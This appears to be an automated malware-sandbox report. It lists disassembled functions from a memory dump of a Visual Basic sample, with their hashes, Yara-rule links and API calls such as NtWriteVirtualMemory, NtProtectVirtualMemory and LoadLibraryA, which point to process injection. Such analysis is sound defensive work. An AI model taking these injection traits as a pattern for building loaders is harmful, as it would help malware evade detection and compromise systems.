Opcode Fuzzy Hash: 878adcf220ccc2e1e7099ce052bbe3d936b5c220463e85974d028992b6116ca7
Instruction Fuzzy Hash: BE1201726042889FDB769F38DC947EA7BB2FF59340F55802ADC899B321D7318A85CB05

Uniqueness

Uniqueness Score: -1.00%

Function 003D4CB6, Relevance: 1.9, APIs: 1, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a00a8e47151409f9800553a3fc77da5b15792a698e75963ff8f03f81fce1568
Instruction ID: 311860c7a9b36d0a2e268be650dd8bdf689a7729afd89fa0cb9c8e67403d29b2
Opcode Fuzzy Hash: 7a00a8e47151409f9800553a3fc77da5b15792a698e75963ff8f03f81fce1568
Instruction Fuzzy Hash: 11F101725042899FCB769F38DC947EE7BB2FF59340F55842ADC898B221D7318A85CB05

Uniqueness

Uniqueness Score: -1.00%

Function 003D4DAB, Relevance: 1.9, APIs: 1, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25df4280b7a37569c7c8e2df12af05aba7470d65c20d7cb71b209f0a6f567a8f
Instruction ID: 9cace8aa80c5f6788f8f0645b6b3f9a9b822575142649558d451c7b1de7d956e
Opcode Fuzzy Hash: 25df4280b7a37569c7c8e2df12af05aba7470d65c20d7cb71b209f0a6f567a8f
Instruction Fuzzy Hash: FBE113725042899FCF769F38DC947EA7BB2FF59340F56402ADC898B220D7318A85CB45

Uniqueness

Uniqueness Score: -1.00%

Function 003D4D73, Relevance: 1.8, APIs: 1, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b375ee73ec074893b40924cef5d2700bf14155b9f0e168c9d8f95f71f43ac944
Instruction ID: 964785a3511e1e053128a07c5daff00d8fd1fe104f3193bc575c9f7c273fb64d
Opcode Fuzzy Hash: b375ee73ec074893b40924cef5d2700bf14155b9f0e168c9d8f95f71f43ac944
Instruction Fuzzy Hash: 06D1F0726002889FDF759E38DC957EA77B2BF59300F55812AEC8A8B210D7318A85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D4D89, Relevance: 1.8, APIs: 1, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f64c73e73977f9b32fa4619316951eb442ebe615cb8951e178a4de444ae3a67f
Instruction ID: c57477e4e4d013db0c0b6170a73307590a6259603845deb412321cf065994d9e
Opcode Fuzzy Hash: f64c73e73977f9b32fa4619316951eb442ebe615cb8951e178a4de444ae3a67f
Instruction Fuzzy Hash: 12D1E0726002889FDF759E78DC957EA77B2BF59300F55812AEC8A8B210D7718A85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D4D95, Relevance: 1.8, APIs: 1, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4afb681a9955e519708d51fd53e6efa03776ebd2b1fb5169aaee8e107791e216
Instruction ID: 89743a0b8d9b60c7ada0f4fe527456e644ac3e3e9f7d69a984b62b3ba8263b26
Opcode Fuzzy Hash: 4afb681a9955e519708d51fd53e6efa03776ebd2b1fb5169aaee8e107791e216
Instruction Fuzzy Hash: 18D1D1726002889FDF759E78DC957EA77B2FF59300F55812AEC8A8B210D7318A85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003D4E8F, Relevance: 1.8, APIs: 1, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0910cc6e8a5c45f6b26c2b393186f2da4936e4928d70241159b5cb34964f67f8
Instruction ID: 931374601628d7cf018bd33ac7fa2309775233b8cbc92ad54507df4619e0dba0
Opcode Fuzzy Hash: 0910cc6e8a5c45f6b26c2b393186f2da4936e4928d70241159b5cb34964f67f8
Instruction Fuzzy Hash: 04D1E3726006889FDB769F38DD947DE7BB2FF59340F46802ADC898B220D7318A85DB45

Uniqueness

Uniqueness Score: -1.00%

Function 003D2B0C, Relevance: 1.8, APIs: 1, Instructions: 281libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,D243D592,?,003D8C1E,003D463E,B72E5D8C,446E364A,ED03C868), ref: 003D79F8

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bd7ae6ca5328f521da9088895801c195f5b48d6c29e1a87904fca85939f6e2d8
Instruction ID: dff28dd60d75d7258da36e3ed9d59de235580af33abd1cc37a9457ab2647c955
Opcode Fuzzy Hash: bd7ae6ca5328f521da9088895801c195f5b48d6c29e1a87904fca85939f6e2d8
Instruction Fuzzy Hash: 52B110726083489FDB749E39D8A57EB77A6AF98340F55842EEC4EDB300D7709E418B42

Uniqueness

Uniqueness Score: -1.00%

Function 003D5003, Relevance: 1.8, APIs: 1, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f9aa1018f2631c29b8b586958aa1067ba3fedf4007f2296614c6fbd54001b1
Instruction ID: 9ce9f58abed315ab51fcc2025aaaa7b483afe60d8ddda11eda8400a0d9a9cbb7
Opcode Fuzzy Hash: 27f9aa1018f2631c29b8b586958aa1067ba3fedf4007f2296614c6fbd54001b1
Instruction Fuzzy Hash: 4CC1F0726006888FCB31DF38DC957DA3BA2FF59344F05812AED888B251D7328A96CB45

Uniqueness

Uniqueness Score: -1.00%

Function 003D175B, Relevance: 1.8, APIs: 1, Instructions: 257COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 003D58B3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: e7d04c9e60cb60eeb5ae9dad2b4d9058d410ae0328e7195e373e7cf3f1c59d73
Instruction ID: fca9e4b68c502cebd3f9f4f6ed74065968c20e269bac9146280cfdf98bd16ff3
Opcode Fuzzy Hash: e7d04c9e60cb60eeb5ae9dad2b4d9058d410ae0328e7195e373e7cf3f1c59d73
Instruction Fuzzy Hash: F8B164725093889FDB32AF3599457DEBBE2AF55340F16446FECC58B222D3308686DB42

Uniqueness

Uniqueness Score: -1.00%

Function 003D9ADB, Relevance: 1.8, APIs: 1, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d8ad5be5ca2bbddbd0795074e3b633872ed4e507c9d9904c3f3eef9641489cf
Instruction ID: 680c8b3c1796961c773a96a743cc660f9abc19770e9b169e11667fd64b068765
Opcode Fuzzy Hash: 1d8ad5be5ca2bbddbd0795074e3b633872ed4e507c9d9904c3f3eef9641489cf
Instruction Fuzzy Hash: CBB1F47150A3C88FCB6AEF35A5943CE7BA2EF56380F16446FD8888F351D2319A52D709

Uniqueness

Uniqueness Score: -1.00%

Function 003D507A, Relevance: 1.7, APIs: 1, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f986f8dad536bc4917ba832449b6e7e44abd8956b452e733e9ff923ab232299
Instruction ID: a6dae8b7572353b472c1d81addcfa4f11fab67764c9d78ea0e42a60ca13cccd5
Opcode Fuzzy Hash: 9f986f8dad536bc4917ba832449b6e7e44abd8956b452e733e9ff923ab232299
Instruction Fuzzy Hash: C491CDB26006889FCF75CE78DC85BEA37B2FF58300F45812AED499B214D7358A86CB41

Uniqueness

Uniqueness Score: -1.00%

Function 003D9B3B, Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d770af31cb3f1b5fd559b1269c245fec3ca88feca49157abe3b810d6069a2f7f
Instruction ID: 0726b7677e7aad207f888e2113cf764d6d0884a92136c78f9239130920f538ba
Opcode Fuzzy Hash: d770af31cb3f1b5fd559b1269c245fec3ca88feca49157abe3b810d6069a2f7f
Instruction Fuzzy Hash: B591DF7111A3888FCB6AEF3599943CE7BA2EF55340F16406FDC498F311D3319A429B09

Uniqueness

Uniqueness Score: -1.00%

Function 003D149E, Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddd50bd73f37bc8fdae847e2d5c31f0004585d2e4bb6372568ba75394616cb2d
Instruction ID: 522a6e9d63074139257eca71bf279ce8f5914a61069581e27b3bda5015a4c395
Opcode Fuzzy Hash: ddd50bd73f37bc8fdae847e2d5c31f0004585d2e4bb6372568ba75394616cb2d
Instruction Fuzzy Hash: E4819A324093CA9FDB32AF34A8493DEBFA2AF52310F59859FD8854B755D3324946CB02

Uniqueness

Uniqueness Score: -1.00%

Function 003D9C63, Relevance: 1.7, APIs: 1, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfe69a782e523df3c6e869a60de1cf5b1726fc4acde49b6e04473b3bef521fc7
Instruction ID: a35ea5ae627bd4f4df4a01b8ab41530e6c9ab1bbc98f5bf71a61b9c1e9971447
Opcode Fuzzy Hash: bfe69a782e523df3c6e869a60de1cf5b1726fc4acde49b6e04473b3bef521fc7
Instruction Fuzzy Hash: F671EF7261A3888FCB66EF3899947DA3BA6EF65340F16406FDC498F251D3308A06C746

Uniqueness

Uniqueness Score: -1.00%

Function 003D51F3, Relevance: 1.7, APIs: 1, Instructions: 167nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,35F37277,?,00000000,?,?,?,?,88549DFB,?), ref: 003D533C

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 410b12a47b775ccfdeff1cc903dc1d576444e9d224e4ffcfc130823be95fa159
Instruction ID: e64a2b7c0c576a6009598912f46b4d538f76b01eb314757e85305c00df5a5e3a
Opcode Fuzzy Hash: 410b12a47b775ccfdeff1cc903dc1d576444e9d224e4ffcfc130823be95fa159
Instruction Fuzzy Hash: 2C71BF725016889FCF36DF38D9947CE7BA2BF99340F49806AD9888B220D7314A56DB45

Uniqueness

Uniqueness Score: -1.00%

Function 003D5D81, Relevance: 1.7, APIs: 1, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26bcc2d233b5ecbe87dab273f1438cffb2df4171453c9607e18a20aa220c260a
Instruction ID: a2f2db418b981d9f27967b5457290479af22da2019d60b54dc21b7c4d7bfdbd7
Opcode Fuzzy Hash: 26bcc2d233b5ecbe87dab273f1438cffb2df4171453c9607e18a20aa220c260a
Instruction Fuzzy Hash: 8D5178725053C98FDB25AF31A8853DEBBA2EFA6384F18052EDC894F361D3314952DB44

Uniqueness

Uniqueness Score: -1.00%

Function 003D60CF, Relevance: 1.7, APIs: 1, Instructions: 151libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 003D5D1F: NtAllocateVirtualMemory.NTDLL(-06A1F7DC,?,0937D923), ref: 003D5EE3

Part of subcall function 003D78EF: LoadLibraryA.KERNEL32(?,D243D592,?,003D8C1E,003D463E,B72E5D8C,446E364A,ED03C868), ref: 003D79F8

LdrInitializeThunk.NTDLL(003D6A14,003D1F32,00000000,?), ref: 003D6A7F

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateInitializeLibraryLoadMemoryThunkVirtual
String ID:
API String ID: 2230336791-0
Opcode ID: 3e4d4f31bacc0d22eb5f72db1a6179e5b3e7a02380a4a5ebbe38b671c00826b9
Instruction ID: 35b52f773c15b8d399236cb4b68e54e5047512a9d62e6ffdf6b8a954b60620d9
Opcode Fuzzy Hash: 3e4d4f31bacc0d22eb5f72db1a6179e5b3e7a02380a4a5ebbe38b671c00826b9
Instruction Fuzzy Hash: 8A513672A093898FDB16FF24D49638E7BA2BF82344F05856FD8949F342E7318406D752

Uniqueness

Uniqueness Score: -1.00%

Function 003D5E07, Relevance: 1.6, APIs: 1, Instructions: 98memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-06A1F7DC,?,0937D923), ref: 003D5EE3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5bb7efc0a2b923009fb14114db2937215605f5aa1717740c424ea7c08808d9be
Instruction ID: 594d6574496eb19f87ed2e2b436eccc9059c9007f885d575fb560c8d304bc321
Opcode Fuzzy Hash: 5bb7efc0a2b923009fb14114db2937215605f5aa1717740c424ea7c08808d9be
Instruction Fuzzy Hash: 9A31E3755043898FEB259F25E891BEE7BA2EF59348F45012EDC8A8B361C7344A45CB44

Uniqueness

Uniqueness Score: -1.00%

Function 003D9DB7, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 003D9F73

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: 9de0d26ddcc449a08694fd90920ad0e916f08f11e09ecfb5645777e0369894c3
Instruction ID: 4c519763ae41f22f132842ce7403f3995c25fecaa5a78bcae9bbfb503885cb01
Opcode Fuzzy Hash: 9de0d26ddcc449a08694fd90920ad0e916f08f11e09ecfb5645777e0369894c3
Instruction Fuzzy Hash: EF41CE32514258CFEF7ADF68C994BEA77AAAF54341F12412BDD0A9F255CB30DA40CB44

Uniqueness

Uniqueness Score: -1.00%

Function 003D788F, Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,D243D592,?,003D8C1E,003D463E,B72E5D8C,446E364A,ED03C868), ref: 003D79F8

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4f5c83cbbe103345c391d71cd2468d45721d1bf56a2ccd608ba9c328de2fd8e0
Instruction ID: ad22d0939055c27d659e0146419f35bf62995088ac6a712a4741098734f54d9f
Opcode Fuzzy Hash: 4f5c83cbbe103345c391d71cd2468d45721d1bf56a2ccd608ba9c328de2fd8e0
Instruction Fuzzy Hash: D541267265E3988FCB36EF3595991CD7B61AF51780F1984AFD8848F202E6314A43E711

Uniqueness

Uniqueness Score: -1.00%

Function 003D958B, Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 003D9682

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: c7e09a0be4980e4f17c29cf6d1b8b90d8f3a57b815591310a0eb453ab0b50391
Instruction ID: 1c2675118e5d048ef601e3b9115f083be32b876a5550306856b15695e0aa8837
Opcode Fuzzy Hash: c7e09a0be4980e4f17c29cf6d1b8b90d8f3a57b815591310a0eb453ab0b50391
Instruction Fuzzy Hash: F82136729153848FDB65AF3888C97DE7BA2FF99350F0A442FD8848B205D33069418B15

Uniqueness

Uniqueness Score: -1.00%

Function 003D5A2D, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,11317FB7), ref: 003D5B82

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b441971a756bb8d775e9e1b5ebd92412ff1c6142ec2cbffde287e48b2e9a1d1f
Instruction ID: 6971c124e7b9062d22938bd1f2b1258abc93487669543450d62b77cb47a33b3d
Opcode Fuzzy Hash: b441971a756bb8d775e9e1b5ebd92412ff1c6142ec2cbffde287e48b2e9a1d1f
Instruction Fuzzy Hash: 96212472A193558BCB68DF35CC417EF77B5AF88740F82812CDC8ED7A48D3705A418A06

Uniqueness

Uniqueness Score: -1.00%

Function 003D0847, Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

6G=M, xrefs: 003D0BFE

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 6G=M
API String ID: 0-3813971639
Opcode ID: 948445dde658d551a7e3e09bfdb8ca30e497d2892fdc4ed59d9966bc1f4cca63
Instruction ID: fd7d1a33340ffcfbc210b273c55fff489625c8fdde657952555a2fbf7c4df550
Opcode Fuzzy Hash: 948445dde658d551a7e3e09bfdb8ca30e497d2892fdc4ed59d9966bc1f4cca63
Instruction Fuzzy Hash: 15B145B26043898FCB36EF74DD953EA7BA6AF98340F06412FDC889B311D7309A458B51

Uniqueness

Uniqueness Score: -1.00%

Function 003D960D, Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 003D9682

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4d0a660329d9b3a101fe131af6bae1bf5f3566eb357ddb467abe6b4d2cff6fb7
Instruction ID: d8bfe373f8ea8568fc466657f2cec88751c48776ff196c22ca45bb98503842b8
Opcode Fuzzy Hash: 4d0a660329d9b3a101fe131af6bae1bf5f3566eb357ddb467abe6b4d2cff6fb7
Instruction Fuzzy Hash: 1DF03CB4A042858FEB78CE6CCC85BEA77A5EF88310F44402EE8599B309C7306D00CB11

Uniqueness

Uniqueness Score: -1.00%

Function 003D0844, Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

6G=M, xrefs: 003D0BFE

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: 6G=M
API String ID: 1029625771-3813971639
Opcode ID: c51b11b481913835ff556363e942c379224df98c47a57c5770001d78d2337529
Instruction ID: badab8ab8e4d76c8ad1e11b37f62d6c2df01fe432f7dcbb1e8b082845e626ae6
Opcode Fuzzy Hash: c51b11b481913835ff556363e942c379224df98c47a57c5770001d78d2337529
Instruction Fuzzy Hash: 7CA146B26043498FCB759F78DC957EA77A6AF98340F05412FDC88EB305D7309A458B52

Uniqueness

Uniqueness Score: -1.00%

Function 003D0973, Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

6G=M, xrefs: 003D0BFE

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 6G=M
API String ID: 0-3813971639
Opcode ID: 745449177de03aca150513a79651e24d60352ffbad6670b8db9c41806e792999
Instruction ID: c07f06c7bcc1094230bbb0197e9b38f9e9ca75b19db5b23036f4a135a755582e
Opcode Fuzzy Hash: 745449177de03aca150513a79651e24d60352ffbad6670b8db9c41806e792999
Instruction Fuzzy Hash: ABA135B26043888FDB3ADF68D9987EA7BA6BF58340F05442FDC88DB311D7309A858755

Uniqueness

Uniqueness Score: -1.00%

Function 00412030, Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00412070
#689.MSVBVM60(Afkappendes,bena,INEQUIVALENT), ref: 004120A5
__vbaStrMove.MSVBVM60 ref: 004120B0
__vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004120B8
__vbaFreeStr.MSVBVM60 ref: 004120CB
__vbaNew2.MSVBVM60(0040D910,0041B360), ref: 004120EC
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D900,00000014), ref: 00412117
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D920,000000D8), ref: 00412145
__vbaStrMove.MSVBVM60 ref: 00412150
__vbaFreeObj.MSVBVM60 ref: 00412159
__vbaNew2.MSVBVM60(0040D910,0041B360), ref: 00412171
__vbaHresultCheckObj.MSVBVM60(00000000,0255F7F4,0040D900,00000014), ref: 00412196
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D920,000000D0), ref: 004121BC
__vbaStrMove.MSVBVM60 ref: 004121C7
__vbaFreeObj.MSVBVM60 ref: 004121D0
__vbaInStr.MSVBVM60(00000000,remises,Acromimia,FFDB7B0B), ref: 004121E6
__vbaFreeStr.MSVBVM60(00412223), ref: 00412216
__vbaFreeStr.MSVBVM60 ref: 0041221B
__vbaFreeStr.MSVBVM60 ref: 00412220

Strings

Afkappendes, xrefs: 0041209D
bena, xrefs: 00412098
INEQUIVALENT, xrefs: 00412088
remises, xrefs: 004121E0
Acromimia, xrefs: 004121DB

Memory Dump Source

Source File: 00000006.00000002.643675243.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.643669376.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.643687737.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.643694168.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$#689Copy
String ID: Acromimia$Afkappendes$INEQUIVALENT$bena$remises
API String ID: 3839436293-732248126
Opcode ID: 879c68fc24608f258a9d5f43a333ff918ec31f5763a6fc645b0c071a5cc0fd0e
Instruction ID: 5bc59ea59a83a983a3c7111c1a73b90e52e4282cef93e917331f306f65b0d5aa
Opcode Fuzzy Hash: 879c68fc24608f258a9d5f43a333ff918ec31f5763a6fc645b0c071a5cc0fd0e
Instruction Fuzzy Hash: 7C514F71E00209ABCB04DFA4DD89ADDBBB4FB08700F24812AE516B72A0D7745945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 003D06F1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

EnumWindows.USER32(003D0819,?,00000000,2C5085B2,003D9D9B,-F2E35506,?), ref: 003D0781

Strings

m4D$, xrefs: 003D0822

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: m4D$
API String ID: 1129996299-1669124958
Opcode ID: 347b940e1b97343e7a6d46079cc65ba328a49ad35e5d880254d6cc8374193921
Instruction ID: 50b0fd49b716b80a1fe82af51d26b7352edc3b2fcc764319eaee6afc7b684ec1
Opcode Fuzzy Hash: 347b940e1b97343e7a6d46079cc65ba328a49ad35e5d880254d6cc8374193921
Instruction Fuzzy Hash: 954102312463898FC72AEF34A8653CA7FA2EF96780F15446FD8C88F292D7359546CB05

Uniqueness

Uniqueness Score: -1.00%

Function 004017AC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 83%

			_entry_() {
				signed char _t1;
				signed char _t5;
				void* _t7;

				_push("VB5!6&*");
				L1:
				_t1 = (_t1 & _t5) + 1 + _t5;
				asm("lock invalid");
				 *_t1 =  *_t1 + 1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + 0xdd;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				 *_t1 =  *_t1 + _t1;
				_t7 = _t7 + 1;
				goto L1;
			}

0x004017ac
0x004017ad
0x004017b0
0x004017b2
0x004017b5
0x004017b7
0x004017b9
0x004017bb
0x004017bd
0x004017bf
0x004017c2
0x004017c4
0x004017c6
0x004017ca
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 004017B1

Strings

VB5!6&*, xrefs: 004017AC

Memory Dump Source

Source File: 00000006.00000002.643675243.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.643669376.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.643687737.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.643694168.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: ea56ee93eaca330ad54ea947888396ff25230e0e813ad3ef2e48051264999b9d
Instruction ID: abc8be890c225a8405e23ac2bec1ddeb58a94565630304e795298ca099831bee
Opcode Fuzzy Hash: ea56ee93eaca330ad54ea947888396ff25230e0e813ad3ef2e48051264999b9d
Instruction Fuzzy Hash: 45D0AE5685E7D14ED31313B189654912F70886366535B49EB91E2DB8E3C4AC084A932B

Uniqueness

Uniqueness Score: -1.00%

Function 003D75C1, Relevance: 1.6, APIs: 1, Instructions: 136libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,D243D592,?,003D8C1E,003D463E,B72E5D8C,446E364A,ED03C868), ref: 003D79F8

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 253596bdce32349b8fa480eeba36dbad721a2a953f623391d21f4c4aded961cc
Instruction ID: 4d1da1f1679c51b3fbe43c3f0a104cf2256b13b34f16b77efdd1c989e8c325f9
Opcode Fuzzy Hash: 253596bdce32349b8fa480eeba36dbad721a2a953f623391d21f4c4aded961cc
Instruction Fuzzy Hash: 3651CD76A18258DFCB359F28E8596DD37A2EF64710F95802EEC49DB300EB718E41DB41

Uniqueness

Uniqueness Score: -1.00%

Function 003D15DF, Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 003D58B3

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 2b0f05e6367d4e0b208313a53e9d86d71c665356019ce0784049bdfd9fe39a41
Instruction ID: 093cfa5e9e7f34c65cc31f76f06f3b8e9f7033b37c12464010769deed6255714
Opcode Fuzzy Hash: 2b0f05e6367d4e0b208313a53e9d86d71c665356019ce0784049bdfd9fe39a41
Instruction Fuzzy Hash: 345147724097C69BD7329F3598593DEBF62AF02314F09829FD8844F292D3324616DB51

Uniqueness

Uniqueness Score: -1.00%

Function 003D58F4, Relevance: 1.6, APIs: 1, Instructions: 117libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 003D5D1F: NtAllocateVirtualMemory.NTDLL(-06A1F7DC,?,0937D923), ref: 003D5EE3

Part of subcall function 003D5A2D: CreateFileA.KERNELBASE(?,11317FB7), ref: 003D5B82

LoadLibraryA.KERNEL32(?,D243D592,?,003D8C1E,003D463E,B72E5D8C,446E364A,ED03C868), ref: 003D79F8

Memory Dump Source

Source File: 00000006.00000002.643654485.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateCreateFileLibraryLoadMemoryVirtual
String ID:
API String ID: 2281259287-0
Opcode ID: 0894a80aaa1d74db98a1fffa3db1b4bdc755cbdd57cc700fab18d4f0d5b71de2
Instruction ID: 277804b6a27a3d1f819cbaeeb9145c3e4b33cbf8a42ec590e869696fd12e1646
